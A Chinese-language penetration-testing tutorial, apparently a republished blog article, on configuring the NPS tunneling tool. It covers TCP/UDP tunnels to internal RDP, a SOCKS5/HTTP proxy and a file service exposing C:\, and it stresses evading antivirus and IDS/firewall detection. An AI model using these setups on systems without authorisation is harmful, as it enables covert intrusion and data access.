NPS详情

No.1

声明

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,雷神众测以及文章作者不为此承担任何责任。 雷神众测拥有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经雷神众测允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。

No.2

好用在哪?

使用方便

直接在server web中进行配置即可。

功能丰富

tcp/udp隧道端口转发、socks5/http内网代理、内网文件访问服务、p2p、域名解析(暂用不到)。

过杀软

client目前还是过杀毒静态检测的。

数据压缩

所有模式均支持snnapy形式的数据压缩,压缩后的流量有一定的绕过内网ips、ids、apt设备的能力。可通过配置文件设置。

tls加密传输

通信内容tls加密传输,有一定的绕过防火墙流量屏蔽与协议屏蔽的能力。可通过配置文件设置。

流畅

数据传输中经过snnapy压缩,数据体积减小,client配置auto_reconnection后,连接中断后可自动重新建立连接,一定程度避免一些代理工具代理缓慢、连接中断问题。

长久性

代码开源,客户端即便被杀了,还可以改改代码、加加壳绕一绕。@liu 在维护项目,期待更多功能上线。

No.3

服务端配置

nps server启动

服务端运行nps test,无报错后nps start启动服务端。

nps server添加client

随便填就行,client config文件用得到,socks5、http代理时候需要用到basic认证帐号密码。

client状态:

得到客户端启动命令:

./npc -server=x.x.x.x:8024 -vkey=adminkey -type=tcp

No.4

客户端配置

客户端启动配置两种:无配置文件、有配置文件。其一即可。

注:server ip 以x.x.x.x代替。

无配置文件启动

使用./npc -server=x.x.x.x:8024 -vkey=adminkey -type=tcp命令启动即可。

360两件套对npc.exe文件和tcp连接无告警。

获取到客户端连接。

有配置文件启动

使用./npc -config=npc config file加载配置文件启动。

全局配置项:

[common]

server_addr=x.x.x.x:8024

# server中监听地址和端口

conn_type=tcp

vkey=adminkey

# server配置的客户端密钥

auto_reconnection=true

# 断线重连,比较好用

max_conn=1000

flow_limit=1000

rate_limit=1000

basic_username=admink

# server配置的basic用户名,用于http、socks5代理认证basic_password=admink

# server配置的basic密码,用于http、socks5代理认证web_username=user

# web登录帐号,这个不用了

web_password=1234

# web登录密码,这个也不用了

crypt=true

# 是否加密传输

compress=true

# 是否压缩传输

No.5

TCP/UDP隧道配置

TCP隧道

两种配置方式:server web配置和client config文件配置。其一即可。

1、server web配置

增加tcp隧道:

隧道建立后,连接server ip x.x.x.x的7000端口,即连接到内网172.16.58.145的3389端口。

net 连接:

2、client config文件配置

config文件在nps client启动时加载即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

crypt=true

compress=true

[tcp]

mode=tcp

target_addr=172.16.58.145:3389

server_port=7000

client 的config文件无法重载,故,只能启动时候加载上所有配置,不建议用config文件方式进行隧道配置,不灵活,推荐使用server web配置方式。

UDP隧道

UDP隧道配置和TCP过程一样,mode改成UDP即可。

No.6

socks5/http内网代理

socks5内网代理

两种配置方式:server web配置和client config文件配置。其一即可。

1、server web配置

增加socks5:

代理设置完毕后,连接server ip x.x.x.x的9000端口即可代理到内网中。

在nps server添加client时,设置了basic权限认证admink/admink,部分浏览器插件如SwitchyOmega不支持s5的basic认证,建议使用proxychains进行代理。

proxychains配置:

socks5x.x.x.x9000adminkadmink

代理web:

代理rdp:

net 连接:

2、client config文件配置

config文件在nps client启动时加载即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

basic_username=admink

basic_password=admink

crypt=true

compress=true

[socks5]

mode=socks5

server_port=9000

client 的config文件无法重载,故,只能启动时候加载上所有配置,不建议用config文件方式进行socks5代理配置,不灵活,推荐使用server web配置方式。

http内网代理

http内网代理和socks5过程一样,mode改成httpProxy即可。

No.7

内网文件访问服务

内网文件访问配置只能在client config中进行。

config文件在nps client启动时加载即可。

[common]

server_addr=x.x.x.x:8024

conn_type=tcp

vkey=adminkey

auto_reconnection=true

basic_username=admink

basic_password=admink

crypt=truecompress=true

[file]mode=file

server_port=8888

local_path=C:\\

strip_pre=/fileservice/

ocal_path配置内网机要设置文件服务的目录。

server_port配置一个server ip上的端口。

strip_pre配置访问文件服务的path。

成功启动:

浏览器中访问:http://x.x.x.x:8888/fileservice/

目前只能做文件访问,还做不到文件管理。

No.8

防御方案

  1. 加强内网攻击检测
  2. 部署apt设备和蜜罐设备
  3. 捕捉内网攻击行为

END

原文发布于微信公众号 - 安恒网络空间安全讲武堂(cyberslab)

原文发表时间:2019-09-18

本文参与腾讯云自媒体分享计划,欢迎正在阅读的你也加入,一起分享。

发表于

我来说两句

0 条评论
登录 后参与评论

扫码关注云+社区

领取腾讯云代金券